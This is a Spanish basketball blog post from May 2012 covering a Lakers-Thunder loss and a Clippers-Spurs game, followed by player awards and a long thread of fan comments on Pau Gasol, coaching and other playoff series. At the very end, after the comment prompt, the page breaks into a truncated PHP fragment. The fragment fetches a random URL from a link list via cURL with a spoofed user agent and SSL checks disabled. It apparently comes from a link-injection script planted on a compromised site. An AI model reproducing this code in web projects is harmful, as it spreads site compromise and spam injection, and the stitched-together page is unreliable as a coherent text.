La Crónica: Doble tragedia en el Staples

20 de May de 2012 por TheDeerHunter

En modo Santa Claus que dijo Bynum. Un oportuno resbalón de Westbrook parecía solucionar la papeleta a los Lakers, que, después de tener todo el partido controlado, se empeñaban en complicarse en el último cuarto. La exquisita educación de Pau devolvía la deferencia, cometiendo la pérdida más absurda de su carrera. Posiblemente su condena definitiva en L.A. tras una serie desastrosa. Durant está como para que le regalen nada y resolvía con un triplazo en la cara de ex-Artest sin más miramientos. Él y Westbrook se habían mostrado imparables todo el choque, notando únicamente la bajada de prestaciones del resto (103-100).

Antes de eso habíamos visto minutos majestuosos de Kobe, recordando quién ha sido el rey estos años hasta que el nuevo rey, Durant, le apagaba los plomos en esa recta final fatídica. También habíamos visto un inicio devastador de Andrew Bynum que no tuvo continuidad y momentos de brillantez del #15 Laker a ambos lados. También buenos minutos de Sessions e incluso de Jordan Hill. No es suficiente, porque la nueva virtud de los Thunder es que es casi imposible desconectarlos, y en la recta final suelen marcar diferencias. Eso, con respecto al año pasado puede significar el matiz entre el fracaso y el mayor de los éxitos. Tras dos situaciones como ésta y la del 2º choque los Lakers quedan vistos para sentencia.

Por su parte, los Clippers comenzaron arrolladores. 33-11 en el primer periodo; 40 puntos en los primeros 14 minutos; una ventaja de hasta 24. Un espejismo. Apenas al final del segundo los Spurs habían enjugado buena parte de la desventaja. En el tercero caía la debacle con un parcial de 24-0. El baño que se llevaba Paul es de los que hacen época (96-86).

Los de Popovic a la suya. Mortífera la tripleta clásica: Parker-Manudo-Duncan. Han jugado juntos únicamente 52 minutos en toda la serie, y el desequilibrio en esos instantes ha sido de +44. El resto hace su trabajo, brillando anoche especialmente Kawhi Leonard. Por los Clippers únicamente un Griffin sin mucha fe y sólo Willams mostrando carácter en la fase más negra. Mentalmente de vacaciones a partir de hoy.

Tal es la superioridad de los Spurs que da la sensación que no se han enfrentado a nadie. Puede ser un arma de doble filo en la hipotética final de conferencia, pero si hay quienes no deberían verse afectados por confianzas absurdas son ellos.

PREMIOS

MVP: Russell Westbrook y Kevin Durant fueron demasiado para los Lakers, sobretodo en el último cuarto en el que anotaron 15 puntos. En el cómputo global, 37 puntos  para Westbrook y 31 y 13 rebotes para Kevin Durant. Cuesta bastante destacar a alguien dentro del juego coral de los Spurs pero nos podemos quedar con el catedráticoTim Duncan (19 puntos, 13 rebotes) o con Tony”hago lo que quiero” Parker (23 puntos y 10 asistencias)

Rookie: Solídisima actuación de Kawhi Leonard con 14 puntos (3 triples) y 9 rebotes.

Sorpresa: Puestos a quedarnos con alguien habrá que quedarse con el rookie del día.

Decepción: Nos duele tener que nombrar un día más a Pau Gasol. Aparte de su pobre partido (10 puntos, 5 rebotes), el español perdió en un mal pase el balón que a la postre se convertiría en el triple final de Kevin Durant.

Esfuerzo en vano: Blake Griffin jugó una primera parte espléndida pero se apagó junto al resto del equipo en el tercer cuarto. Al final acabó con 28 puntos, 16 rebotes, 2 robos y 3 tapones. Kobe Bryant se vio de nuevo demasiado solo ante los Thunder. Sus 38 puntos, 8 rebote y 5 asistencias de poco sirvieron ante el empuje final de los jóvenes.

Imágenes | AP Photos / Getty Images

Comenta

39 comentarios a esta entrada

  1. Nacho dice:
    #1

    Si aquí se habla así de Pau, imagino cómo será en LA. Que no jugó buen partido, ciertto, pero de ahí a atribuirle la derrota a él, debería ir un mundo. Que se miren en Lakers los minutos finales de las dos derrotas ajustadas. Y que se lo miren bien.
    Yo he terminado cabreado, muy cabreado, y eso que teóricamente me la sudan estos amarillos, pero el corazón me puede. Y vuelvo a decir que se miren el final de partido, sobre todo Kobe. Porque lo que pùede ser un partido excelso no puedes pensar que las culpas vayan a otro jugador del que pasa el equipo olímpicamente. YT eso, hablado de Olímpicos, espero ver a PAu en Londres, y el año que viene en Houston, por ejemplo, donde este año hubiera hecho un temporadón, o al menos, una plácida temporada.

      Citar

  2. Nacho dice:
    #2

    Lo siento, pero tengo que soltar rabia. No puede ser que le de voces a mi hija por una bobá, cuando el cabreo que tengo es culpa de los Lakers.
    Es que nadie se da cuenta del lechuzo de coach que tienen…

    Aquí se ha dado a Brooks, porque lo consideran un flojo entrenador. Y aunque solo sea por algo que vemos todos, ha hecho lo que debía en el ajuste defensivo. Los Lakers poco sistema ofensivo tienen, pero cuando juegan a algo hacen circular la bola por el poste alto, desde donde Pau distribuye, y bloquea para liberar a Kobe, o para jugar pick’n’roll (cosa que debe estar buscando Brown en el diccionario). ¿Qué hago para frenar esto?. pues, descontado que intento secar a Kobe con Shefolosa o quien toque, voy a joderles la poca circulación de bola que tienen. Pego a Ibaka como una lapa a Pau. Y cuando no está Sergue, pego a Collison y hasta a Durant, que son los que han defendido a Gasol. Resultado, se embarranca el juego Laker.

    ¿Soluciones? Las están hablando Mike y Messina, ah! no, que todavía no saben cual es el problema. Como los amarillos son buenos, pues se nota poco. Primer partido, barrida, entra dentro de lo normal. Segundo lo llevamos más o menos bien, y alguien la caga al final, ¿por qué? supongo que el cansancio. Tercer partido, juego de roces y desde la línea aguantamos y ganamos, bien, pero con un mosqueíllo. Cuarto partido. ¡Anda!, podemos meter balones a Bynum, que ya nos olvidaremos en la segunda parte. Hoy además, es día Kobe. Y las mete de todos los colores. Pero la bola circula mal, y se empieza a abusar de los aclarados, y claro los primeros se meten, pero luego cuesta mantener ese ritmo. Y yo que soy muy bueno, posteo, penetro y me hago un par de fade away, qué bien, vamos de 12 arriba. Westbrook pagó ayer la entrada al parque, y hoy es invitación de la casa, pasa cuando quieras… hínchate, que es gratis. Coño, que quedan cinco minuto de partido, y lo de postear, driblar, penetrar, y pegarse, cuesta mucho más, ¡joder! que tengo ya unos años. Como soy muy bueno me levanto cuando tengo un centímetro, o sin tenerlo. Saldrán mandarinas, pero si no lo hago yo, ¿quién lo hace?
    Brown sigue preguntándole a Ettore como salen mejor los fetuccini alla intemerata y…
    ¡Leches! que triple de Durant, pero si el que las metía era el 0, ¿no?, dice desde su marrón el entrenador. A lo que alguien del banco le responde, No te preocupes, ha sido culpa del blanco alto ese, que ha perdido la bola. Sí, ese del que te querías librar. Tu tranquilo que sigues otro año.

    Pero al final esto es un juego, y las soluciones son más fáciles. Ya lo decía Lope:
    El cazador con industria
    pone al pelícano indiano
    fuego alrededor del nido;
    y él, descendiendo de un árbol,
    para librar a sus hijos
    bate las alas turbado,
    con que más enciende el fuego
    que piensa que está matando.
    Finalmente se le queman,
    y sin alas, en el campo
    se deja coger, no viendo
    que era imposible volando.

    P.D. Perdón por la chapa.

      Citar

  3. nba dice:
    #3

    Por si alguien lo dudaba , este parece ser el penultimo partido de Pau con la camiseta Laker, veremos si tambien es el de “Miguel Marron”, lastima porque Kobe parece que ya no va a tener mas oportunidades de ganar mas anillos.
    A diferencia del año pasado en la eliminatoria contra Dallas, en la que en ningun momento a estos Lakers se les vio capaces de ganar un partido, en esta exista la posibilidad de que la serie llevase el marcador favorable al reves.
    Respecto a la perdida de Pau, es lo que pasa cuando no rotas a tus jugadores, pues que no llegan frescos mentalmente al tramo final del partido, ya bien sea tanto Pau como Kobe

      Citar

  4. Sancho88 dice:
    #4

    Se puede decir que esta temporada de los Lakers no debería haber ocurrido? Es decir, la salida tan traumática de Jackson, con aquellas broncas en el último partido, el encasquetamiento fallido a todas las franquicias de Pau, y ahora, este final tan extraño… Muchas cosas hay que cambiar, y aunque me duela, he de reconocer que Pau ya no tiene sito allí, porque lo haga bien o lo haga mal la gente ya no lo quiere, solo quiere que se vaya y libere su salario y pista. Es así, bussiness es bussiness, él cobra mucho dinero y tiene que aceptarlo. No le van a faltar novias, como es evidente, pero en Lakers ya no va a jugar más. Cuando suceden este tipo de situaciones, lo mejor para ambas partes es que se vaya el jugador.

    No pensé jamás que Pau acabaría así en este equipo, pero así ha sucedido. Todas las semanas siendo rumor, un entrenador que no cree en él… pienso que no se merecía acabar así, pero es deporte y hay que aceptarlo como es, como un juego. Desde luego, yo siempre recordaré al señor estúpido este de los escupitajos como la mayor mierda humana que jamás se haya sentado en un banquillo de baloncesto. Su mediocridad está a años luz de otros entrenadores que me habéis visto criticar desde aquí. Ninguno se acerca ni de lejos a su incompetencia y a su desconocimiento total del juego de baloncesto. Miguelito, salao, fuck off!!

      Citar

  5. txusma dice:
    #5

    Nacho:
    Si aquí se habla así de Pau, imagino cómo será en LA.

    Yo tampoco creo que debamos caer en culpabilizar totalmente a Pau de la derrota de esta noche. Está claro que su imagen perdiendo el balón con empate en el marcador en un mal pase le va a marcar y seguramente hará que muchos le señalen pero al acabar el partido en twitter ya había gente que hablaba del 2 de 10 de Kobe en el último cuarto, por ejemplo. Si miramos la secuencia de acontecimientos, Con los Lakers 2 arriba y balón, es ex-Artest el que pierde la bola, anota Durant jugando en el poste, Kobe se juega un tiple y lo falla, Perkins recoge el rebote y anota (defendido por Bynum), Kobe anota 2 tiros libres, Westbrook resbala y ahora llega la pérdida de Pau seguida del mega-triplazo de Kevin Durant. Creo que se pueden repartir culpas para todos los Lakers.
    De todas manera sí quiero ser crítico con Pau pq no es posible que un jugador de su categoría no se juegue ni un tiro en el último cuarto. Ni uno! En ningún momento le llega la pelota en buenas condiciones? Por ejemplo, en la jugada de la pérdida creo que debería haber tirado tras el pick&pop con Kobe. Con un par y a quien no le guste agua. Me da que es eso sobretodo lo q más se le critica, por encima de la pérdida.

      Citar

  6. TheDeerHunter dice:
    #6

    Yo no me quedo con la última pérdida ni le he echo la culpa a él por ella. Si se la hecho es por su forma de asumir su responsabilidad. Esa última pérdida es el reflejo de lo que está pasando con él.
    Arrugadísimo siendo suave. De eso no tiene la culpa ni Brown, ni el Kobesistema ni nada de eso… porque más de una vez hemos visto al propio Kobe insistirle visiblemente de que tenía que resolver él. No lo hace porque no quiere. Insiste hasta lo incomprensible en doblarla hasta cuando lo tiene franco para intentar resolver y cuando el pase significa un marrón para el compañero o incluso una pérdida de posesión.
    Se entiende, porque casi todo lo que intenta lo está fallando. Todos los tiros a media distancia y casi cualquier intento al poste que haga. Esa es otra, para recibir al poste lo primero que hay que hacer es fijar a tu par y facilitar el pase. Igualito que Kobe por ahí, oye. Y para colmo, después de que cuesta horrores meterla dentro inexorablemente la saca otra vez, casi al primer toque. Ya ni lo intenta. La culpa la tienen otros. Muy bien.

    Lamentablemente él ya no está en la onda de los objetivos del equipo. Alguien me ha dicho que le echaremos de menos, pero yo digo que llevamos ya dos años haciéndolo.
    Ha sido muy grande para los Lakers y ójala lo pueda ser en otro sitio. Aquí no tengo ninguna duda que no lo va a ser más.

      Citar

  7. Sancho88 dice:
    #7

    Ok Deer, perfecta crítica. Espero que con el resto de jugadores seas igual de justo.

      Citar

  8. TheDeerHunter dice:
    #8

    Depende de qué deba exigírsele a unos y a otros.
    El nivel que yo aún esperaba es el máximo. Éste no es el Gasol que conocemos. Ponerle excusas a la situación tampoco es lo que el propio Gasol haría, creo yo.

      Citar

  9. nba dice:
    #9

    Me decanto por lo que comentaba, txusma, que Miguel te pone a 5 metros del aro , no te sientes comodo cuando recibes el balon ahi, pues con un par como trailer, que ya no eres el tirillas de hace 10 años, para adentro a intenatar un mate, o en su defecto sacaras falta , y asi una y otra vez cada vez que recibas en el poste alto. Al final las acabaras metiendo, lo que no puede ser es esa parsimonia, sobre todo con la cantidad de baloncesto que tiene dentro todavia Pau.
    Que luego te lee la cartilla Mike o Bryant, a estas alturas que van a hacer sentarte y sacar a Murphy , por favor..

      Citar

  10. rumbero dice:
    #10

    Lo de Gasol está siendo una larga agonía desde el momento del traspaso frustado. Estoy de acuerdo en que hay que exigirle el máximo porque se lo hemos visto dar. Igual le ha faltado echarle un par de huevos y pegar un golpe en la mesa, pero no parece ser su carácter y no debe ser nada fácil darle la vuelta a la situación en un equipo que no te quería y con un ¿entrenador? que no te tiene en cuenta.
    Pero vaya, desde mi punto de vista el mayor culpable de este 3-1 son los Thunder. Son muy buenos. Si, Gasol pierde el balón, pero es que luego viene Durant y te clava un triple monumental (estas cosas deberían valer doble en las votaciones del MVP). Y Westbrook no será Stockton pero es un jodido jugón a campo abierto (ya vendrá Popovich a cortocircuitarlo). En fin, a ver si son capaces de alargar la serie los amarillos pero no tiene muy buena pinta.

    Regalio del “OLD” jo-jo http://www.youtube.com/watch?v=VZ-_p6qnCnI

      Citar

  11. HisRoyalAirness dice:
    #11

    Buenas tardes, me llamo Timothy Theodore Duncan y este años voy a impartir la asignatura Fundamentos de baloncesto I; el examen final será en mayo o junio y las clases serán eminentemente prácticas.

    En otro orden de cosas, lo de Pau es una cagada de las que hacen época, pero no me vale eso de tirarte 10 tiros, fallar 8 (en el último cuarto) y la última posesión dársela a un jugador que lleva todo el partido sin hacer un solo tiro en el poste alto y con la muñeca HELADA de no haber tocado el balón en los últimos 8 minutos.
    Pau mal por no tirar, de acuerdo. Kobe nefasto en el último cuarto. Estás abrasándoles en la pintura y de repente les da por empezarse a jugar tiros lejanos?? Es una broma? Y RIck Adelman chupando frío en Minnesotta, en fin…

    De todos modos el triple de Durant es inverosímil, lo normal hubiera sido una canasta de 2 y última posesión para Lakers

      Citar

  12. nba dice:
    #12

    Lo de Tim, es , me quedo sin palabras.
    Royal deja a Adelman en Minnesota que alli tiene los mimbres para hacer algo grande,los Lakers ya perdieron la oportunidad de contratarle, respecto a Lakers , o hablan seriamente y sin tapujos entre ellos 4(Brown-Kobe-Pau-Bynum), que el baloncesto puede ser muy sencillo copon !!!

      Citar

  13. Sancho88 dice:
    #13

    Está claro quienes de esos cuatro van a ser los damnificados: la tercera espada y el aspersor de escupitajos marca ACME

      Citar

  14. HisRoyalAirness dice:
    #14

    Ah no, si yo encantado de que Adelman esté en Minnesotta eh? Y, pese a la clasificación final de los Wolves creo que ha hecho maravillas con ellos. Le dio la manija a Ricky, explotó a Pekovic hasta ponerle en números All-Star, hizo ajustes defensivos básicos y, sobre todo, hizo la que, para mí, es la mejor y más sencilla jugada de pizarra de la temporada: el triple bloqueo estático contra los Clippers para tirar (Love) el triple de la victoria. Grande Rick

      Citar

  15. Esteban dice:
    #15

    Lo dije a mitad de temporada y ahora se me da la razon, los lakers debieron cambiar a pau mientras tuviera valor, dos años seguidos de PO a muy mal nivel lo deja muy mal parado en el mercado

    Si en algun momento se hablo de rondo, creo q ya hoy ni se involucra en un trade por pau, aumento la diferencia de valor a favor del base celta

    No creo q nadie quiera dar algo por pau mas q un exepcion, no creo q haya mas jugadores involucrados en el trade

      Citar

  16. Sancho88 dice:
    #16

    Crees mal Estebal. Los Rockets están interesantísimos en Pau. Sé que te jode, pero este verano saldrá al mercado y muchos equipos ofrecerán muchas cosas

      Citar

  17. Esteban dice:
    #17

    Sancho88:
    Crees mal Estebal. Los Rockets están interesantísimos en Pau. Sé que te jode, pero este verano saldrá al mercado y muchos equipos ofrecerán muchas cosas

    jajaja no me jode en absoluto, dime q ofreceria rockets? a thebbet?
    q aceptaria lakers? a scola quiza…

    no es un jugador que nadie quiera, no dije eso, pero si q dudo que alguien se desprenda de una super estrella por el, como seria si wolves ofreciera a love, sencillamente pau ya no esta para un trade asiç
    y para llenar esos 18 millones que se van con pau, creo que es preferible espacio salarial q jugaodres con malos contratos, pues eso creo yo

    un trade q a mi me parece logico y beneficioso para ambos, seria pau por bosh
    pau es un interno mas alto y fuerte que bosh y como ya eh dicho, al no estar tan rapido y agil como antes debe trasformarse en pivot, al estilo duncan, y seria idelA en miami

    bosh, con su alergia a la pintura y su tiro largo que abre defensas, seria el complemento perfecto para bynum

    le estoy dando un buen valor a pau sancho! sucede que dudo que alguien de una joya por el, (incluso bosh seria un precio alto) y es preferible el espacio salarial que dejara su trade exeption

      Citar

  18. Esteban dice:
    #18

    quiza no es el lugar, pero la sugestion psicologica q tiene el heat con hibbert es increible, nunca hibbert ha sido tan dominante, y no es tanto por el sino por el miedo que les ha proporcionado al heat

      Citar

  19. Sancho88 dice:
    #19

    Hombre, es por eso y porque les saca cabeza y media a todos los internos de los Heat… Ha metido el culo en la pintura, como diría Pau, jejej, y no se lo saca nadie. Dan pena los pívots de los Heat… Quizá un Bosh x Pau podría ser, ya que los Heat mejorarían mucho su juego en la pintura, y aunque por un año tendrían su tope salarial muy apretado, pues Pau cobraría más que LB y Wade, al siguiente quedaría libre y podrían tener mucho más espacio.

      Citar

  20. Nacho dice:
    #20

    Viendo a estos Heat, sin Bosh, y con este Wade, ¡cómo estará echando de menos LeBron a aquellos Cav’s del mister marrón! Sin duda mejor equipo que este.

      Citar

  21. Esteban dice:
    #21

    Sancho88:
    Hombre, es por eso y porque les saca cabeza y media a todos los internos de los Heat… Ha metido el culo en la pintura, como diría Pau, jejej, y no se lo saca nadie. Dan pena los pívots de los Heat… Quizá un Bosh x Pau podría ser, ya que los Heat mejorarían mucho su juego en la pintura, y aunque por un año tendrían su tope salarial muy apretado, pues Pau cobraría más que LB y Wade, al siguiente quedaría libre y podrían tener mucho más espacio.

    viste hablando se entiende la gente

      Citar

  22. Sancho88 dice:
    #22

    Sabes que me gusta disentir dialécticamente contigo, además en la Hoops nos votaron como equipos enfrentados a muerte, hay que justificarlo, jeje.

    Pd: Hola, me llamo Leandrinho Barbosa y quiero declarar mi simpatía con James Harden. Yo también meto canastas después de acabar el descenso en Slalom del Gigante de ST. Moritz

      Citar

  23. Esteban dice:
    #23

    debo decir que me parece extraordinario el plan de los pacers de faltarles literalmente el respeto al heat

    arranco con las declaraciones de vogel, que al heat deben haber pensado, “joder este entrenador nuevito ysus chiquitos deberian pedirnos fotos y admirarnos”, algo les debe haber hecho ruido esas declaraciones, fue un aviso que les hablaban de tu a tu, de igual a igual

    y lo de granger peleandose constantemente con lebron, otra vez, lebron debe pensar este tio me pedira autografos durante la serie y no, ni por asomo, choque tras choque, cara a cara, como diciendole “tu quien eres” a quien se cree un rey

    y obvio la lesion de bosh, pero creo que el heat cuando se lesiono rose y howard se vio sin rivales en la conferencia, pensando que seria un trote, primero barremos a los chicos de los pacers y luego a los viejos cansados de boston

    los ha tomado por sorpresa la actitud pacers, de su entrenado y jugadores, y obvio la lesion e bosh es una perla, pero ya en el primer juego, con bosh nunca hubo supremacia notable del heat

      Citar

  24. rumbero dice:
    #24

    Wade se pone las pilas. Sin su mejor version va a ser casi imposible para los Heat
    Y me gusta el rol de segundo base que ha cogido Collison. De primero no daba el nivel que necesitan los Pacers pero es un complemento mas que bueno

      Citar

  25. Esteban dice:
    #25

    rumbero:
    Wade se pone las pilas. Sin su mejor version va a ser casi imposible para los Heat
    Y me gusta el rol de segundo base que ha cogido Collison. De primero no daba el nivel que necesitan los Pacers pero es un complemento mas que bueno

    si a roto todos los papeles, en principio por explosion y por haber cumplido ese rol en los spurs, parecia que a hill le sentaba mejor el puesto de reserva, y collison, por no ser anotador parecia que debia quedarse como titular
    hill a mi entender no rindio tanto como esperaba saltando de base o hasta escolta desde el banco, y collison cumplio una mediocre temporada

    ahora, hill de titular a duplicado su rendimiento y collison de suplente lo mismo

    otro punto para vogel

      Citar

  26. Nacho dice:
    #26

    Si antes hablo de Wade, antes me calla la boca.

      Citar

  27. Esteban dice:
    #27

    4ta falta de mster hibbert, sin el en cancha a los pacers les costara horrores

      Citar

  28. Esteban dice:
    #28

    aun sin bosh, con wade y lebron jugando asi la segunda mitad, si no bajan el ritmo aniquilaran el partido en un rato

    son simplemente indetenibles, tener dos mvp asi en un equipo y a 14 millones por año cada uno es muhco robo, de ahi que quiero q pierda el heat

      Citar

  29. Sancho88 dice:
    #29

    si cobran mucho porque cobran mucho, y si cobran poco porque cobran poco… en qué quedamos? Ellos asumieron que cobrarían poco para no pasarse del impuesto de lujo, y lo hicieron porque están ya forradísimos de dinero y porque lo que buscan es el anillo…

    Bueno, sobre lo de Collison, sí, aporta mucha decisión ofensiva desde el banquillo, pero creo que esto ocurre porque los bases de los Heat no están haciendo nada para pararle y todos se están centrando más en la defensa de los grandes. Pacers están trabajando muy bien el pick&roll, haciendo verdadero destrozo entrando por el centro de la zona y sacando faltas y canastas fáciles. Muy bien Collison, ya era hora que algún pequeño asumiera poder ofensivo en este equipo que no fuera Granger…

      Citar

  30. Esteban dice:
    #30

    monologo de lebron y wade de parte del heat, 35 y 26 puntos por el momento para cada uno, el que lo sigue es chalmers con 8 y haslem con 6

    ah tambien metieron un tirito en el aro anthony y miller, y un triple battier

      Citar

  31. Sancho88 dice:
    #31

    Granger se suma a la fiesta de los pasos. El lema es “Estáis todos invitados”, y Pacers se aplica aquello de… “Más habló que no calló”, que se dice en mi pueblo. Flopping es lo que están haciendo, fingiendo y exagerando siempre en todos los contactos y buscando el conflicto. Es curioso que hay faltas en ataque que se pitan a Chalmers o Anthony, y sin embargo los pasos de Pacers o las entradas muy fuertes de Collison no se cortan por el mismo rasero. Hoy, desde luego, nadie puede hablar de conspiraciones pro miamenses, sino más bien de caserismo

      Citar

  32. Nacho dice:
    #32

    Pero es que wade lleva 10 de 10 en la 2ª parte.
    Desde que lo puse a caldo, vamos

      Citar

  33. Sancho88 dice:
    #33

    Cómo me gusta hacer pasos lolololooooooooooooooooo, me llamo Granger y me encantaaaaaaaaaaaaaaa. Dios, es exagerado, dañino, lamentable…

    Haslem sumando como las hormiguitas, a lo Felipe Reyes. Siempre está bien tener jugadores tan sacrificados

      Citar

  34. Sancho88 dice:
    #34

    Dos cracks, una gran defensa en el último cuarto y dos pívots de los ‘mediocres’ de la liga aportando, como son Haslem y Anthony. Es lo que yo decía el otro día, da igual que un tipo no tenga los recursos suficientes para ser un gran jugador, pero sí lo puedes aprovechar si haces que la bola se mueva. Muy bien los Heat defendiendo a muerte, saliendo rápido a correr y metiendo muchos balones cerca de la canasta, sobre todo en la segunda parte, que han generado tiros fáciles y han logrado sacar muchas faltas. Ahí les han sacado las cosquillas a los Pacers. Si en juego exterior no eres superior, pues intenta aprovechar las ventajas por dentro al correr con tipos que tienen muy buen pase y finalizar rápido y sencillo. Ese es el camino, Heat han demostrado que si se centran son superiores, y han salvado un match ball muy complicado. Ahora de nuevo vuelven a tener la ventaja de campo a su favor y recuperan totalmente el control de la eliminatoria. Incluso se ha visto buen diálogo entre Spoelstra y Wade.

    Ya digo, la clave ha sido correr muy rápido y la agresividad en defensa (legal, porque sí, Spoelstra les ha enseñado a defender muy bien, y ya lo dije el otro día). Además, Haslem y Anthony han estado valientes y han logrado sacar a los interiores de los Pacers de debajo de su aro, que eran las canastas fáciles que estaban consiguiendo en la primera parte. Notable alto o sobresaliente esta noche para los Heat. Raza de campeones

      Citar

  35. Esteban dice:
    #35

    victoria del heat, con una actuacion de lebron james, a la altura de las mejores en la historia de la NBA, 40 puntos, 18 rebotes, 9 asistencias, quiza chamberlain o jabbar hacian numeros por el estilo, de otra epoca
    y pensar q hay quienes dicen que ha habido aleros individualmente mejores que lebron, madre mia

    la serie esta para cualquiera, pero como pocas, hoy las faltas de hibbert terminan por condicionar a los pacers, como tamb actuaciones brutales de wade y lebron
    si hibbert no se mete en problemas de faltas y vogel inventa algo para parar a los MVP q tiene enfrete, con dobles marcas, o cajon y uno con lebron, los pacers pueden ganar en miami y en indiana los prox dos juegos
    pero si no hay solucion para lebron, los heat pueden ganar en miami y en indiana las prox dos juegos

    repito, esta para cualquiera

      Citar

  36. nba dice:
    #36

    Por si alguien dudaba de las ansias de Lebron por conseguir un anillo

      Citar

  37. Andorra98 dice:
    #37

    Cierto que brutal partido de LB y Wade, pero no nos engañemos, anoche por primera vez en la serie no estuvieron solos, y no lo digo solo por Haslem (genial el ultimo cuarto) sino por la intensidad defensiva de TODOS sobretodo cerrando el rebote y evitando segundas oportunidades al juego interior de Indiana.

    Esta claro que si tienes carencias ofensivas, tienes que jugarte la carta de ir a muerte en tu zona y rezar para que tus dos superestrellas tengan un gran dia.

      Citar

  38. GreenPride dice:
    #38

    Bueno pues los dos equipos de LA se lo ponen en chino filipino para pasar, vamos que empiezan casi a despedirse.
    Vayamos por partes. Con el Staples color rojo Clippers, estos salieron en tromba ante unos demasiado relajados Spurs. Con esa agresividad por montera y un Griffin por primera vez en los PO espectacular deshicieron a los Spurs durante un primer cuarto brillante y llegaron hasta los 24 de ventaja. ¿Y que hicieron los Spurs? Pues nada, tranquilidad que estos no pueden aguantar así siempre, empezaron a jugar su basket y durante el segundo cuarto volvieron a coger poco a poco el ritmo del partido bajando la diferencia. Una vez controlado desquiciaron el ataque de los Clippers en el tercer cuarto y les finiquitaron con un 24-0 de parcial para dar una lección de veteranía en el último cuarto y mantener sin problemas la ventaja poniendo el 3-0 y la sensación de barrida en la serie muy próxima.
    Por los Clippers, está claro que no pueden ganar sin que CP3 sea decisivo y en estas series los Spurs le están haciendo polvo. Cuando penetra siempre tiene gente para puntear sus tiros y Parker o Green son muy rápidos para cubrirle en el 1×1. Sin su faro, los Clips se agarran a Mo Williams o Young como salvavidas ofensivos pero eso no es suficiente ante unos engrasadísimos Spurs que parecen dominarles sin ningún problema. Fenomenal partido de Leonard y esperemos que Griffin esté tomando nota de cómo se juega de 4, está recibiendo unas clases fenomenales en primera persona de Duncan. Todo parece encaminar la serie al 4-0 cosa que la verdad que yo no esperaba.
    Por cierto, impagable la imagen al descanso de Duncan, Parker y Popovich tranquilamente sentados bromeando en el banquillo y echándose unas risas. Muy confiados parecen estos Spurs que ya acumulan 17 victorias seguidas, 7 en PO.
    Veremos si los Thunder pueden ponerles en dificultades, ya que tras adelantarse 3-1 parece claramente su rival para la final de conferencia. Con la pista amarilla y púrpura laker los de LA hicieron su mejor partido de la serie hasta los 8 minutos finales. Balones dentro para empezar con Bynum super enchufado, luego Kobe maltratando a sus pares con buenos porcentajes y ayudas puntuales de Blake, Artest, Hill e incluso Sessions, gran defensa sobre Harden aunque Durant y Westbrook mantenían a los suyos en el partido. Parecía que los Lakers iban a lograr el exitazo de ganar en back to back a los Thunder pero de repente se les olvidó lo que les había dado 13 puntos de ventaja a menos de 8 minutos para el final. Y es que de aquí al final sólo fueron capaces de meter 9 puntos y Kobe ensució su partido con un 2 de 8 en el último cuarto. Veamos sus ataques en esos 8 minutos finales:
    Triple de Fisher -Mal tiro de Blake en penetración
    Libres de Durant -Tiro forzadísimo de Bryant ante Harden y Durant
    Canasta de Westbrook de media distancia -Kobe dobla a Blake que anota en penetración
    Canasta de Westbrook de media distancia (y2)-Triple fallado de Kobe con la mano de Harden en la cara
    2+1 de Westbrook tras bloqueo -Canasta forzadísima de Kobe otra vez con la mano de Harden en la cara
    Aquí Brooks cambia la defensa a Bryant y pone a Durant sobre él
    Canasta de Westbrook de media distancia (y3) – Triple fallado por Kobe, mandarina que da en el tablero
    Falla Westbrook-Triple fallado por Artest con la mano de Harden en la cara+Rebote Laker+Entrada forzadísima de Kobe que sin fuerzas pierde el balón intentando tirar ante Durant lo que provoca
    Contraataque y falta a Durant, tiros libres Tiempo muerto laker donde claramente Brown les dice que metan balones dentro.
    Fallo en tiro 1×1 de Bynum+falta en el rebote a Durant-2 libres de Durant
    Lío laker intentando meter balon dentro y Artest se tira un tiro con la mano de Harden en la cara- Canasta de Durant en el poste ante Kobe
    Triple fallado por Kobe (que ya pasa de mirar adentro)-Palmeo de Perkins
    Kobe saca una mas que discutible falta a Ibaka y mete los libres
    Y aquí pérdida de Westbrook, pérdida de Pau, triplazo de Durant y triple fallado por Kobe.
    Es decir que Kobe se tira hasta 7 tiros, ninguno de ellos ni medio claro mientras el resto de Lakers miran las jugadas y participan poco. Mientras los Thunder aprovechan la nula defensa del Pick&Roll para que Westbrook meta 4 canastas y la clase de Durant para finiquitar el partido.
    Creo que esta vez ya si que no hay arreglo para los Lakers. Morirán quemando naves en el 5º probablemente aunque ojalá me equivoque y consigan ganar y poner las cosas interesantes para el 6º. Los Thunder están haciendo un curso acelerado de finales apretados y Durant está convirtiéndose en el jugador clutch de estos PO con 3 canastas ganadoras ya. ¿Podrán acabar con los Lakers y plantar cara a los enrachados Spurs?

      Citar

  39. Sancho88 dice:
    #39

    Me encantan tus analisis, GreenPride. Siempre con un día para respirar y poder ver todo con mucha más perspectiva, la realidad queda mejor reflejada, y se puede estudiar todo con más calma y detenimiento. Eres de lejos el comentarista más cerebral y DelBosqueístico de toda la página, jeje. Gracias por tus análisis porque son impagables!!

    Saludos

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>